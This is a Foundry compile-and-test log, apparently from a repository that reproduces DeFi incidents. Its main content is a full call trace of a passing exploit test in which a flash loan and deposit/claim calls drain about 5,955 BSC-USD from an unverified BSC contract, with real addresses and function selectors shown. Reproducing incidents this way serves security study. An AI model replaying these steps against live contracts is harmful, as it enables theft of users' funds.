Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-06/UnverifiedContr_9ad32_exp.sol:31:9:
   |
31 |         address(Vulncontract).call(abi.encodeWithSelector(bytes4(0xe2bbb158), 0, 5_955_466_788_004_705_247_296));
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (9302): Return value of low-level calls not used.
  --> src/test/2023-06/UnverifiedContr_9ad32_exp.sol:32:9:
   |
32 |         address(Vulncontract).call(abi.encodeWithSelector(bytes4(0xc3490263), 0, 5_955_466_788_004_705_247_296));
   |         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UnverifiedContr_9ad32_exp.sol:29:31:
   |
29 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UnverifiedContr_9ad32_exp.sol:29:47:
   |
29 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-06/UnverifiedContr_9ad32_exp.sol:29:88:
   |
29 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 659.49ms (4.01ms CPU time)

Ran 1 test for src/test/2023-06/UnverifiedContr_9ad32_exp.sol:Exploit
[PASS] testExploit() (gas: 152053)
Logs:
  [End] Attacker BUSD after exploit: 0.010000000000000000
  [End] Attacker BUSD after exploit: 5955.476788004705247296

Traces:
  [3649] Exploit::setUp()
    ├─ [0] VM::createSelectFork("bsc", 29469587 [2.946e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [195332] Exploit::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000 [1e16]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BUSD after exploit", val: 10000000000000000 [1e16], decimals: 18)
    ├─ [173843] 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A::flashLoan(0, 1243763239827755213151683 [1.243e24], Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   ├─ [10871] 0x55d398326f99059fF775485246999027B3197955::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1243763239827755213151683 [1.243e24])
    │   │   ├─ emit Transfer(from: 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1243763239827755213151683 [1.243e24])
    │   │   ├─  storage changes:
    │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0x0000000000000000000000000000000000000000000107608a53534676ae5dc3 → 0
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x0000000000000000000000000000000000000000000107608a76da38e66f5dc3
    │   │   └─ ← [Return] true
    │   ├─ [136635] Exploit::DPPFlashLoanCall(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 1243763239827755213151683 [1.243e24], 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496)
    │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, 9999000000000000000000 [9.999e21])
    │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, value: 9999000000000000000000 [9.999e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0efdf8cc732fb5ff04a70ca40ffd2ca624110049178812823e459057de475915: 0 → 0x00000000000000000000000000000000000000000000021e0c0013070adc0000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [51763] 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92::deposit(0, 5955466788004705247296 [5.955e21])
    │   │   │   ├─ [7462] 0x55d398326f99059fF775485246999027B3197955::approve(0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─ emit Approval(owner: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, spender: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, value: 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xf539c1faad42a0617c3daa7b13970995923716a63033120ba9df15c6ffd18c10: 0x0000000000000000000000000000000000000000000000007ce66c50e2840000 → 0x000000000000000000000000000000000000000000000142d8b45246610aa040
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [10834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, value: 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─ emit Approval(owner: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, value: 4043533211995294752704 [4.043e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdc2360dee3d9de71b71f1e86fe478e57079951113e469247a18963834f2f0a28: 0x000000000000000000000000000000000000000000000142d8b45246610aa040 → 0x000000000000000000000000000000000000000000000285b168a48cc2154080
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000107608a76da38e66f5dc3 → 0x00000000000000000000000000000000000000000001061db1c287f28564bd83
    │   │   │   │   │   @ 0x0efdf8cc732fb5ff04a70ca40ffd2ca624110049178812823e459057de475915: 0x00000000000000000000000000000000000000000000021e0c0013070adc0000 → 0x0000000000000000000000000000000000000000000000db334bc0c0a9d15fc0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 0x000000000000000000000000000000000000000000000142d8b45246610aa040
    │   │   │   └─ ← [Stop]
    │   │   ├─ [35922] 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92::claim(0, 5955466788004705247296 [5.955e21])
    │   │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─ emit Approval(owner: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, spender: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x7f163cc1f3add80e8358913b1a551b0119f56cc8cf2be2d9653bc56d9e98426c: 0 → 0x000000000000000000000000000000000000000000000142d8b45246610aa040
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─ emit Transfer(from: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5955466788004705247296 [5.955e21])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xdc2360dee3d9de71b71f1e86fe478e57079951113e469247a18963834f2f0a28: 0x000000000000000000000000000000000000000000000285b168a48cc2154080 → 0x000000000000000000000000000000000000000000000142d8b45246610aa040
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000001061db1c287f28564bd83 → 0x0000000000000000000000000000000000000000000107608a76da38e66f5dc3
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0x000000000000000000000000000000000000000000000142d8b45246610aa040 → 0
    │   │   │   └─ ← [Stop]
    │   │   ├─ [8834] 0x55d398326f99059fF775485246999027B3197955::transferFrom(0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5955466788004705247296 [5.955e21])
    │   │   │   ├─ emit Transfer(from: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, to: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5955466788004705247296 [5.955e21])
    │   │   │   ├─ emit Approval(owner: 0xAC899Ef647533E0dE91E269202f1169d7D47Ae92, spender: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000107608a76da38e66f5dc3 → 0x0000000000000000000000000000000000000000000108a3632b2c7f4779fe03
    │   │   │   │   @ 0xdc2360dee3d9de71b71f1e86fe478e57079951113e469247a18963834f2f0a28: 0x000000000000000000000000000000000000000000000142d8b45246610aa040 → 0
    │   │   │   │   @ 0x7f163cc1f3add80e8358913b1a551b0119f56cc8cf2be2d9653bc56d9e98426c: 0x000000000000000000000000000000000000000000000142d8b45246610aa040 → 0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [3271] 0x55d398326f99059fF775485246999027B3197955::transfer(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A, 1243763239827755213151683 [1.243e24])
    │   │   │   ├─ emit Transfer(from: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A, value: 1243763239827755213151683 [1.243e24])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xe15794f9863f61e2b79c6824f1e1c5aa8ab443721329bf1566a811b7d14c4bd5: 0 → 0x0000000000000000000000000000000000000000000107608a53534676ae5dc3
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000108a3632b2c7f4779fe03 → 0x000000000000000000000000000000000000000000000142d8d7d938d0cba040
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x3707462b181da5757afb393000713f9d89955f52c38cceeebf01e0b050d6ff3e: 0 → 0x000000000000000000000000000000000000000000000142d8b45246610aa040
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000001061db1c287f28564bd83 → 0x0000000000000000000000000000000000000000000107608a76da38e66f5dc3
    │   │   │   @ 0x7f163cc1f3add80e8358913b1a551b0119f56cc8cf2be2d9653bc56d9e98426c: 0x000000000000000000000000000000000000000000000142d8b45246610aa040 → 0
    │   │   │   @ 0x0efdf8cc732fb5ff04a70ca40ffd2ca624110049178812823e459057de475915: 0 → 0x00000000000000000000000000000000000000000000021e0c0013070adc0000
    │   │   └─ ← [Stop]
    │   ├─ [2531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 7264852556979292191 [7.264e18]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 1243763239827755213151683 [1.243e24]
    │   ├─ [531] 0x2170Ed0880ac9A755fd29B2688956BD959F933F8::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 7264852556979292191 [7.264e18]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x9ad32e3054268B849b84a8dBcC7c8f7c52E4e69A) [staticcall]
    │   │   └─ ← [Return] 1243763239827755213151683 [1.243e24]
    │   ├─ emit DODOFlashLoan(: Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 0, : 1243763239827755213151683 [1.243e24])
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(Exploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5955476788004705247296 [5.955e21]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BUSD after exploit", val: 5955476788004705247296 [5.955e21], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000010001010000000000000000000000000000000000000000 → 0x0000000000000000010000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.28s (5.24s CPU time)

Ran 2 test suites in 8.45s (7.94s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
